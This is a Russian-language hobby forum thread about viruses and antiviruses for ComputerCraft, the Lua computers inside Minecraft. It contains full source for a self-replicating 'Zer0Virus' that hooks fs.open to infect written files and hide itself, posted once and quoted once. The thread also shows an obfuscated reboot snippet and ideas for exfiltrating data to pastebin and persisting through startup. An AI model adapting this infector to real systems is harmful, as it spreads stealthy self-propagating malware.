Перейти к содержимому
NEO

Вирусы-Антивирусы

Рекомендуемые сообщения

я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

:)

В принципе все оч. просто, только подскажи строчку по которой компьютер должен перезагрузиться/включиться (пользуюсь CC)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

os.reboot() перезагрузка , os.shutdown() выключение.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Гость Operarus

Я думаю ваш парсер не сможет определять такой код:

local temp = "o"
temp = os["re".."b"..temp..temp.."ot"]
temp()
Для тех кто не понял он перезагружает компьютер.

А ведь написать такой криптор много легче.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

А почему вы решили, что любая программа, которая делает reboot или shutdown непременно вирус?

А почему вирус непременно должен выполнять reboot или shutdown?

Думаю, что парсер если и должен искать вирус, то какой то конкретный с известным кодом вирус, а не гипотетический вредоносный код. Вот почему я и предложил: для начала давайте напишем вирус. Между прочим, совершенно серьезно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

ну да.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я думаю ваш парсер не сможет определять такой код:

local temp = "o"
temp = os["re".."b"..temp..temp.."ot"]
temp()
Для тех кто не понял он перезагружает компьютер.

А ведь написать такой криптор много легче.

всё можно найти.Вот с помощью флагов нее и string.gmatch(), можно находить и не такие коды.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

этот парсер,очень примитивен,но не требует много ресурсов компьютера,можно сделать парсер ,который будет lua-шный код обрабатывать,разбивать на лексемы,строить логические деревья,и находить среди них вредоносный код.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Гость Operarus

Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Не знаю, кто как, но я не преследую цель заразить чей то компьютер или очистить от вируса. Для меня написание вируса и антивируса к нему это просто интересная задачка по программированию. Поэтому, давай отбросим практический интерес и придумаем код, который мог бы самораспространяться (вирус), и лекарство для него.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ну как учтиво заметили в группе ВК, реднет сети слабовато распространены, чтобы вирус мог свободно гулять по компам, а так ведь с использованием КрафтНета можно спокойно летать по всей зоне покрытия и выгружать инфу с компов на пастбин, заливать на компы вредоносный софт, это-то вроде как не очень уж и сложно. Вся проблема в автоматизации процесса распростронения.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я только не пойму как антивирус будет отличать вирус от не вируса, ведь если вы выложите этот антивирус в сеть, то любой сможет тестировать свой вирус на нём и когда он этим вирусом заразит все компьютеры будет уже поздно пополнять базы сигнатур.

тогда извиняй ,тебе не понять.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Кто хотел СС-вирус? Получите!


Внимание! Запуск нижеприведенного кода приведет к заражению компьютера!
Автор не несет ответственности за потерю информации в результате действия вируса!

 

-- Zer0Virus
local body=[[
local nativeopen=fs.open
local VirBody=...
fs.open=function(path, mode)
  local file=nativeopen(path, mode)
  if file then
    if mode=='r' then
      if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end
      else file=nativeopen(path, mode) end
    elseif mode=='w' then
      file.writeLine('-- Zer0Virus')
      file.writeLine('local body='..string.char(91,91))
      file.write(VirBody)
      file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)")
      file.flush()
    end
  end
  return file
end]] loadstring(body,'Zer0Virus')(body)
print('This program is infected!')

 




Что делает вирус?
1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его.
2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы.
3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла.

Чего вирус не делает?
1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым.
2) Не заражает копируемые и перемещаемые файлы.

Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку

print('This program is infected!')

поздравляю, Ваш компьютер заражен.
Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!!
Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса.

Изменено пользователем Zer0Galaxy

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Кто хотел СС-вирус? Получите!

 

 

Внимание! Запуск нижеприведенного кода приведет к заражению компьютера!

Автор не несет ответственности за потерю информации в результате действия вируса!

 

 

-- Zer0Virus
local body=[[
local nativeopen=fs.open
local VirBody=...
fs.open=function(path, mode)
  local file=nativeopen(path, mode)
  if file then
    if mode=='r' then
      if file.readLine()=='-- Zer0Virus' then for i=1,19 do file.readLine() end
      else file=nativeopen(path, mode) end
    elseif mode=='w' then
      file.writeLine('-- Zer0Virus')
      file.writeLine('local body='..string.char(91,91))
      file.write(VirBody)
      file.writeLine(string.char(93,93).." loadstring(body,'Zer0Virus')(body)")
      file.flush()
    end
  end
  return file
end]] loadstring(body,'Zer0Virus')(body)
print('This program are infected!') 

 

 

 

 

 

Что делает вирус?

1) При первом запуске зараженной программы остается в ОЗУ компьютера т.е. заражает его.

2) После заражения компьютера прописывает собственный код во все вновь создаваемые и редактируемые файлы. 

3) Скрывает свое тело. Т.е. при открытии зараженного файла на зараженном компьютере вы увидите содержимое не зараженного файла.

 

Чего вирус не делает?

1) Автоматически не заражает файл startup. Т.е если startup не заражен, после перезагрузки компьютер остается чистым.

2) Не заражает копируемые и перемещаемые файлы.

 

Для проверки работы вируса сохраните код под спойлером в файл с именем virus. Запустите его. Откройте файл virus на редактирование. Если Вы увидели только строчку

print('This program are infected!')

поздравляю, Ваш компьютер заражен.

Создайте или отредактируйте в редакторе edit какой нибудь другой файл. Только не startup !!!

Перегрузите компьютер и вновь откройте созданный файл. Вы должны увидеть в нем код вируса.

Видел в одном компе такой вирус, наверно у кого то такое мышление как и у тебя), нуу... Или всё же это ты

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Кто хотел СС-вирус? Получите!

Если я правильно понял, то до ручного запуска программы будет виден истинный код, а значит шанс того, что вирус будет активирован крайне мал, что печально, ну а в целом прикольная реализация)

Можно было бы в принципе еще и со стартапом покурить, чтобы при перезагрузке вирус сам скачивался и после рестарта запускался... Хм, интересно в общем, очень интересно)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я нарочно не делал вирус слишком уж эффективным. Кто то хотел писать антивирус? Можно попробовать написать антивир для этого вируса. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
я предлагаю написать антивирус , который будет сканировать содержимое дисков или внешних источников данных. работать,он будет как parser для него будет создан файл в котором будут написаны структуры кода,которые наносят вред компьютеру,parser будет подставлять эти структуры и определять есть ли этот файл вирус или нет,если да то он будет удалять его с диска , а если он попал на компьютер ,то и на компьютере. файл со структурами кода можно будет обновлять и не надо будет постоянно переписывать parser.

Если при вставке дискеты запускается файлик startup то никакой антивирус не поможет

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в тему...

×   Вы вставили отформатированное содержимое.   Удалить форматирование

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.


×
×
  • Создать...